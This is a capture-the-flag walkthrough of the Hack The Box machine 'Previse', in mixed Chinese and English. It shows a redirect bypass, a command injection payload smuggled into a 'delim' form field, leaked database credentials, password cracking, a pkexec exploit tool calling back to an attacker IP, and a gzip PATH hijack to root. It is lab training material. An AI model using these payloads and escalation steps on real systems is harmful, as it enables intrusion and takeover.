[Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限提升

Information Gathering

IP Address Opening Ports
10.10.11.104 TCP:22,80

$ ip='10.10.11.104'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

bash 复制代码
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 53ed4440116e8bda698579c081f23a12 (RSA)
|   256 bc5420ac1723bb5020f4e16e620f01b5 (ECDSA)
|_  256 33c189ea5973b1788438a421100c91d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-title: Previse Login
|_Requested resource was login.php
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

EAR && Php files analysis RCE

$ feroxbuster -u 'http://10.10.11.104' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

http://10.10.11.104/nav.php

删除相应包中Location: login.php。

复制代码
POST /accounts.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Origin: http://10.10.11.104
Connection: close
Referer: http://10.10.11.104/accounts.php
Cookie: PHPSESSID=a68gg2tk2nehln8jm9bvie7q99
Upgrade-Insecure-Requests: 1

username=maptnh&password=maptnh&confirm=maptnh&submit=

http://10.10.11.104/download.php?file=32

$ unzip siteBackup.zip

logs.php

用户名:m4lwhere

$ cat config.php

username:root
password:mySQL_p@ssw0rd!:)

复制代码
POST /logs.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.10.11.104/nav.php
Cookie: PHPSESSID=a68gg2tk2nehln8jm9bvie7q99
Upgrade-Insecure-Requests: 1
Content-Length: 30


delim=;ping -c 1 10.10.16.28

User.txt

62f7407560ca5d003a6fd3a917ec8bdf

Lateral Movement

$ mysql -u root -p'mySQL_p@ssw0rd!:)'

mysql> select * from accounts;

不能在这里直接复制...需要在accounts.php寻找可复制的盐

$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.

$ john hash --wordlist=/home/maptnh/Desktop/rockyou.txt --format=md5crypt-long

password:ilovecody112235!

Privilege Escalation:TRP00F && Gzip Path Hijack

TRP00F

https://github.com/MartinxMax/trp00f

$ python3 trp00f.py --lhost 10.10.16.28 --lport 10000 --rhost 10.10.16.28 --rport 10032 --http 9999

! Do you want to exploit the vulnerability in file 'pkexec' ? (y/n) >y

Gzip Path Hijack

$ export PATH=/tmp:$PATH
$ echo -e '#!/bin/bash\n/bin/bash'>/tmp/gzip
$ chmod +x /tmp/gzip
$ sudo /opt/scripts/access_backup.sh

Root.txt

440aff1f3d4da77970e98a9dc5257cfd

相关推荐
北冥you鱼3 分钟前
Go Modules 使用指南:从入门到精通
开发语言·后端·golang
l1t6 分钟前
duckdb 1.6dev新增的.manual命令
开发语言·数据库
你怎么知道我是队长12 分钟前
JavaScript的函数介绍
开发语言·前端·javascript
YMWM_18 分钟前
python-venv虚拟环境
linux·开发语言·python
不负岁月无痕34 分钟前
STL -- C++ 红黑树封装 Map 和 Set
java·c语言·开发语言·c++·面试
小园子的小菜38 分钟前
Java核心基础:反射与泛型底层原理及实战用法详解
java·开发语言
十五年专注C++开发1 小时前
C++之std::numeric_limits介绍
开发语言·c++·limits
2501_925963381 小时前
Hi3516 + WS73 SDIO Wi-Fi 适配笔记
java·开发语言
CoderYanger1 小时前
视频切割脚本(Python版)
linux·开发语言·windows·后端·python·程序人生·职场和发展
辞旧 lekkk1 小时前
CMake工程指南(一)
linux·运维·服务器·开发语言·qt·学习·萌新